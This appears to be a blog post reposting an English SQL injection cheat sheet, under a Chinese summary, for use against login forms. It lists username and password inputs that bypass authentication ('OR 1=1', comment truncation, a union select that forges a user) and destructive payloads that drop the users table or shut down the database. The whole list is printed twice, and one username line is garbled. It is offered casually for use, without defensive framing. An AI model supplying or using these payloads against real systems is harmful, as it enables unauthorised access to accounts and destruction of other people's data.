本文介绍了几种常见的SQL注入攻击方式,包括使用特定语法绕过认证、利用漏洞删除数据库表及远程关闭数据库等。通过示例展示了如何构造恶意SQL语句进行攻击。
I found this small text file on my computer last night, it explains the various bypass injections and when you should use them.
Enjoy ;)
To authenticate without any credentials we can use,
CODE
Username : ' OR '='
Password : ' OR '='
To authenticate with just the username.
CODE
Username : admin'--
To authenticate as the first user in the users table.
CODE
Username : ' or 1=1--
To authenticate as fictional user
CODE
Username : ' union select 1, 'user', 'passwd' 1 --
Causing Destruction
To drop a database table
CODE
Username : ';drop table users--
To shut down the database remotely
CODE
Username:hackuin60shackuin60s'
Password : '; shutdown--
Enjoy ;)
To authenticate without any credentials we can use,
CODE
Username : ' OR '='
Password : ' OR '='
To authenticate with just the username.
CODE
Username : admin'--
To authenticate as the first user in the users table.
CODE
Username : ' or 1=1--
To authenticate as fictional user
CODE
Username : ' union select 1, 'user', 'passwd' 1 --
Causing Destruction
To drop a database table
CODE
Username : ';drop table users--
To shut down the database remotely
CODE
Username:hackuin60shackuin60s'
Password : '; shutdown--
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
